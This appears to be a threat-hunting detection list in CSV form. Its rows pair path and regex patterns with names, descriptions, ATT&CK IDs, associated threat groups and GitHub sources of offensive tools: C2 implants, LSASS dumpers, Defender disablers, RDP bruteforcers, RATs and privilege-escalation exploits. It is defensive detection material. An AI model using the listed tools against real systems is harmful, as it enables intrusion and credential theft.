"*/NimDllSideload.git*",".{0,1000}\/NimDllSideload\.git.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","9166"
"*/NimDllSideload/*",".{0,1000}\/NimDllSideload\/.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","N/A","9","2","167","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z","9167"
"*/NimExec.git*",".{0,1000}\/NimExec\.git.{0,1000}","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/frkngksl/NimExec","1","1","N/A","N/A","N/A","4","372","38","2023-12-12T06:59:59Z","2023-04-21T19:46:53Z","9168"
"*/Nimperiments.git*",".{0,1000}\/Nimperiments\.git.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","1","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","9169"
"*/NimPlant.*",".{0,1000}\/NimPlant\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","9170"
"*/NimPlant/*",".{0,1000}\/NimPlant\/.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","9171"
"*/nimplants/*",".{0,1000}\/nimplants\/.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","9172"
"*/nimproxydll.git*",".{0,1000}\/nimproxydll\.git.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","9173"
"*/nimproxydll/*",".{0,1000}\/nimproxydll\/.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","1","N/A","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","9174"
"*/ninja.crt*",".{0,1000}\/ninja\.crt.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9178"
"*/Ninja.git*",".{0,1000}\/Ninja\.git.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9179"
"*/ninja.key*",".{0,1000}\/ninja\.key.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9180"
"*/Ninja.py*",".{0,1000}\/Ninja\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","9181"
"*/nipe.git",".{0,1000}\/nipe\.git","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","N/A","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","9182"
"*/nipe.pl",".{0,1000}\/nipe\.pl","offensive_tool_keyword","nipe","An engine to make Tor Network your default gateway.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","1","N/A","N/A","N/A","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","9183"
"*/nishang*",".{0,1000}\/nishang.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security. penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","9188"
"*/nishang/*",".{0,1000}\/nishang\/.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","9189"
"*/NIX REMOTE WEB-SHELL.php*",".{0,1000}\/NIX\sREMOTE\sWEB\-SHELL\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","9190"
"*/nje-node-brute.nse*",".{0,1000}\/nje\-node\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9191"
"*/nje-pass-brute.nse*",".{0,1000}\/nje\-pass\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9192"
"*/NJRAT 7.exe*",".{0,1000}\/NJRAT\s7\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1071.001 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1555.003 - T1132.001 - T1005 - T1568.001 - T1041 - T1083 - T1562.004 - T1070.004 - T1070.009 - T1105 - T1056.001 - T1112 - T1106 - T1571 - T1027.004 - T1027.013 - T1120 - T1057 - T1012 - T1021.001 - T1018 - T1091 - T1113 - T1082 - T1033 - T1125","TA0002 - TA0003 - TA0005 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Transparent Tribe - Group5 - Aquatic Panda - APT41 - LazyScripter - Gorgon Group - TA2541 - APT-C-36","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","9193"
"*/NLBrute*.rar*",".{0,1000}\/NLBrute.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","9194"
"*/NLBrute*.zip*",".{0,1000}\/NLBrute.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","9195"
"*/NLBrute.exe*",".{0,1000}\/NLBrute\.exe.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","1","N/A","N/A","10","1","1","2","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z","9196"
"*/nmap.py*",".{0,1000}\/nmap\.py.{0,1000}","offensive_tool_keyword","crackmapexec","parser nmap.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","9197"
"*/nmap_smb_scan_all_*.txt*",".{0,1000}\/nmap_smb_scan_all_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","9201"
"*/nmapAnswerMachine.exe*",".{0,1000}\/nmapAnswerMachine\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9202"
"*/nmapAnswerMachine.py*",".{0,1000}\/nmapAnswerMachine\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","9203"
"*/nntp-ntlm-info.nse*",".{0,1000}\/nntp\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9213"
"*/no_defender.exe*",".{0,1000}\/no_defender\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9214"
"*/NoAmci.exe*",".{0,1000}\/NoAmci\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9215"
"*/NoArgs.exe*",".{0,1000}\/NoArgs\.exe.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","9216"
"*/NoArgs.git*",".{0,1000}\/NoArgs\.git.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","N/A","8","2","151","25","2024-05-07T20:38:34Z","2024-03-15T16:54:49Z","9217"
"*/No-Consolation.git*",".{0,1000}\/No\-Consolation\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","1","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","9218"
"*/no-defender.git*",".{0,1000}\/no\-defender\.git.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9219"
"*/no-defender.sln*",".{0,1000}\/no\-defender\.sln.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9220"
"*/no-defender.vcxproj*",".{0,1000}\/no\-defender\.vcxproj.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9221"
"*/no-defender-loader.exe*",".{0,1000}\/no\-defender\-loader\.exe.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9222"
"*/no-defender-loader/main.cpp*",".{0,1000}\/no\-defender\-loader\/main\.cpp.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","1","N/A","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","9223"
"*/NodeRelayConsoleExe_d64.exe*",".{0,1000}\/NodeRelayConsoleExe_d64\.exe.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","9224"
"*/Nofault.exe*",".{0,1000}\/Nofault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","10","6","525","82","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z","9225"
"*/NoFilter.cpp*",".{0,1000}\/NoFilter\.cpp.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9226"
"*/NoFilter.exe*",".{0,1000}\/NoFilter\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9227"
"*/NoFilter.git*",".{0,1000}\/NoFilter\.git.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9228"
"*/NoFilter.sln*",".{0,1000}\/NoFilter\.sln.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9229"
"*/NoFilter.vcxproj*",".{0,1000}\/NoFilter\.vcxproj.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","9230"
"*/nopac.exe",".{0,1000}\/nopac\.exe","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/noPac","1","0","N/A","N/A","N/A","1","36","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z","9231"
"*/nopac.py*",".{0,1000}\/nopac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9232"
"*/No-PowerShell.cs*",".{0,1000}\/No\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9233"
"*/NoPowerShell.exe*",".{0,1000}\/NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9234"
"*/NoPowerShell.exe*",".{0,1000}\/NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","NoPowerShell","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9235"
"*/NoPowerShell.exe*",".{0,1000}\/NoPowerShell\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","NoPowerShell","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","9236"
"*/No-PowerShell.exe*",".{0,1000}\/No\-PowerShell\.exe.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","N/A","8","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","9237"
"*/nopowershell.git*",".{0,1000}\/nopowershell\.git.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","9238"
"*/nopowershell/*",".{0,1000}\/nopowershell\/.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","9239"
